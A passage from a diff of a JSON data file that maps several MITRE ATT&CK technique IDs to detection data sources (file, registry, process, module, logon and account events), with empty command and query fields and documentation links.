This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or 
Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + null, + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ] + ] + }, + { + "technique_id": "T1554", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1036.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1036.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1553.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": 
"windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1553.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that 
represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1553", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + 
"collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", 
+ "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script 
interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + 
{ + "technique_id": "T1027.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file content", + "description": "Data contained in a file.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file content", + "description": "Data contained in a file.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1552", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + 
"collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data 
